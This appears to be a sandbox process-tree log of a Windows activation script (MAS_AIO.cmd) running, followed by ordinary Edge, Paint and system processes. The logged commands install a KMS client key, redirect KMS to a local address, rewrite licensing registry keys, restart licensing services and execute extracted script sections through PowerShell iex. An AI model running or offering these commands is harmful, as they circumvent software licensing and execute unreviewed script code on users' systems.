C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':wpatest\:.*';iex ($f[1])"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5960
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "13" "4⤵PID:5508
-
-
C:\Windows\System32\find.exefind /i "Error Found"4⤵PID:948
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE" 2>nul4⤵PID:5912
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND LicenseDependsOn is NULL AND PartialProductKey IS NOT NULL) get LicenseFamily /VALUE5⤵PID:4852
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "try { $null=([WMISEARCHER]'SELECT * FROM SoftwareLicensingService').Get().Version; exit 0 } catch { exit $_.Exception.InnerException.HResult }"4⤵PID:3728
-
-
C:\Windows\System32\cmd.execmd /c exit /b 04⤵PID:3288
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value4⤵PID:6112
-
-
C:\Windows\System32\find.exefind /i "computersystem"4⤵PID:5608
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "0" "4⤵PID:1176
-
-
C:\Windows\System32\findstr.exefindstr /i "0x800410 0x800440 0x80131501"4⤵PID:4612
-
-
C:\Windows\System32\reg.exereg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedTSReArmed"4⤵PID:5744
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ClipSVC\Volatile\PersistedSystemState"4⤵PID:3160
-
-
C:\Windows\System32\reg.exereg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"4⤵PID:3600
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe"4⤵PID:4364
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"4⤵PID:4520
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe\PerfOptions"4⤵PID:3360
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm" 2>nul4⤵PID:5352
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "SkipRearm"5⤵PID:1188
-
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Plugins\Objects\msft:rm/algorithm/hwid/4.0" /f ba02fed39662 /d4⤵PID:5536
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore 2>nul4⤵PID:2336
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v TokenStore5⤵PID:744
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE" 2>nul4⤵PID:116
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey is not null) get ID /VALUE5⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State" 2>nul4⤵PID:5268
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "(Get-ScheduledTask -TaskName 'SvcRestartTask' -TaskPath '\Microsoft\Windows\SoftwareProtectionPlatform\').State"5⤵PID:3268
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "4⤵PID:5560
-
-
C:\Windows\System32\find.exefind /i "Ready"4⤵PID:420
-
-
C:\Windows\System32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "actionlist" /f4⤵PID:4444
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask"4⤵PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$acl = (Get-Acl 'C:\Windows\System32\spp\store\2.0' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow FullControl') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"4⤵PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$acl = (Get-Acl 'HKLM:\SYSTEM\WPA' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow QueryValues, EnumerateSubKeys, WriteKey') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"4⤵PID:5764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$acl = (Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' | fl | Out-String); if (-not ($acl -match 'NT SERVICE\\sppsvc Allow SetValue') -or ($acl -match 'NT SERVICE\\sppsvc Deny')) {Exit 2}"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5808
-
-
C:\Windows\System32\reg.exereg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion"4⤵PID:560
-
-
C:\Windows\System32\reg.exereg query "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies"4⤵PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$netServ = (New-Object Security.Principal.SecurityIdentifier('S-1-5-20')).Translate([Security.Principal.NTAccount]).Value; $aclString = Get-Acl 'Registry::HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies' | Format-List | Out-String; if (-not ($aclString.Contains($netServ + ' Allow FullControl') -or $aclString.Contains('NT SERVICE\sppsvc Allow FullControl')) -or ($aclString.Contains('Deny'))) {Exit 3}"4⤵PID:4764
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value 2>nul4⤵PID:2204
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and PartialProductKey IS NOT NULL AND LicenseDependsOn is NULL and Description like '%KMSCLIENT%'" Get Name /value5⤵PID:3616
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE" 2>nul4⤵PID:4092
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f') get ID /VALUE5⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "0724cb7d-3437-4cb7-93cb-830375d0079d 16e50fa1-a5a0-479f-aa81-90756738b4f1 30a42c86-b7a0-4a34-8c90-ff177cb2acb7 32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee 357eb3d2-42c6-4731-ac66-df185cdd3683 59eb965c-9150-42b7-a0ec-22151b9897c5 60b3ec1b-9545-4921-821f-311b129dd6f6 632ffa10-3b75-4180-aed9-4e799a44563b 685e4f86-7690-4334-bf9f-2074335811bf 6c4de1b8-24bb-4c17-9a77-7b939414c298 7a802526-4c94-4bd1-ba14-835a1aca2120 90da7373-1c51-430b-bf26-c97e9c5cdc31 cce9d2de-98ee-4ce2-8113-222620c64a27 d552befb-48cc-4327-8f39-47d2d94f987c e923d769-e71d-4c2a-925a-93547cbe6547 ed655016-a9e8-4434-95d9-4345352c2552" "4⤵PID:4524
-
-
C:\Windows\System32\find.exefind /i "32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee"4⤵PID:2552
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call InstallProductKey ProductKey="M7XTQ-FN8P6-TTKYV-9D4CC-J462D"4⤵PID:4372
-
-
C:\Windows\System32\cmd.execmd /c exit /b 04⤵PID:1036
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingService where __CLASS='SoftwareLicensingService' call RefreshLicenseStatus4⤵PID:1964
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE" 2>nul4⤵PID:4500
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get ID /VALUE5⤵PID:2284
-
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f4⤵PID:2756
-
-
C:\Windows\System32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f4⤵PID:2252
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"4⤵PID:1700
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee" /f /v KeyManagementServiceName /t REG_SZ /d "127.0.0.2"4⤵PID:3164
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\32d2fab3-e4a8-42c2-923b-4bf4fd13e6ee" /f /v KeyManagementServicePort /t REG_SZ /d "1688"4⤵PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null"4⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Command and Scripting Interpreter: PowerShell
PID:1088
-
-
-
C:\Windows\System32\sc.exesc query sppsvc4⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\System32\find.exefind /i "STOPPED"4⤵PID:5464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Job { Restart-Service ClipSVC } | Wait-Job -Timeout 20 | Out-Null"4⤵PID:4184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Command and Scripting Interpreter: PowerShell
PID:5052
-
-
-
C:\Windows\System32\ClipUp.execlipup -v -o4⤵PID:1228
-
C:\Windows\System32\clipup.execlipup -v -o -ppl C:\Users\Admin\AppData\Local\Temp\temAAB9.tmp5⤵
- Checks SCSI registry key(s)
PID:3008
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"4⤵PID:3576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')5⤵
- Command and Scripting Interpreter: PowerShell
PID:2504
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /S /D /c" echo "Windows 10 Enterprise LTSC" "4⤵PID:5328
-
-
C:\Windows\System32\find.exefind /i "Windows"4⤵PID:796
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c "wmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE" 2>nul4⤵PID:5532
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get GracePeriodRemaining /VALUE5⤵PID:5736
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powershell.exe "$([DateTime]::Now.addMinutes(6930012)).ToString('yyyy-MM-dd HH:mm:ss')" 2>nul4⤵PID:2500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$([DateTime]::Now.addMinutes(6930012)).ToString('yyyy-MM-dd HH:mm:ss')"5⤵PID:5392
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\MAS_AIO.cmd') -split ':regdel\:.*';& ([ScriptBlock]::Create($f[1])) -protect"4⤵PID:5968
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f4⤵PID:1400
-
-
C:\Windows\System32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f"4⤵PID:1056
-
-
C:\Windows\System32\reg.exereg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "State" /f4⤵PID:4764
-
-
C:\Windows\System32\reg.exereg delete "HKU\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /v "SuppressRulesEngine" /f4⤵PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "Start-Job { Stop-Service sppsvc -force } | Wait-Job -Timeout 20 | Out-Null; $TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('SLpTriggerServiceWorker', 'sppc.dll', 22, 1, [Int32], @([UInt32], [IntPtr], [String], [UInt32]), 1, 3); [void]$TB.CreateType()::SLpTriggerServiceWorker(0, 0, 'reeval', 0)"4⤵PID:2204
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Command and Scripting Interpreter: PowerShell
PID:6072
-
-
-
-
-
C:\Windows\system32\Clipup.exe"C:\Windows\system32\Clipup.exe" -o1⤵PID:4324
-
C:\Windows\system32\Clipup.exe"C:\Windows\system32\Clipup.exe" -o -ppl C:\Windows\TEMP\temA9A0.tmp2⤵
- Checks SCSI registry key(s)
PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5432 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:22⤵PID:5040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 /prefetch:32⤵PID:2184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:82⤵PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:12⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:12⤵PID:632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵PID:884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:12⤵PID:4112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4136 /prefetch:12⤵PID:2204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:5592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:5760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5836 /prefetch:82⤵PID:1272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:1428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3776 /prefetch:82⤵PID:3532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6176 /prefetch:82⤵
- Suspicious use of SetWindowsHookEx
PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:12⤵PID:2252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:82⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,7647688629880441147,6578878015886982176,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 /prefetch:22⤵PID:4764
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\1920x1200_(Windows_10_versions_1507-1511).jpg"2⤵
- Sets desktop wallpaper using registry
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5812
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3744
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5736
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x500 0x4501⤵PID:5936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:1132
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:4844
-
C:\Windows\System32\winver.exe"C:\Windows\System32\winver.exe"1⤵PID:1872
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
PID:6096 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" werconcpl.dll, LaunchErcApp -queuereporting2⤵PID:5056
-
-
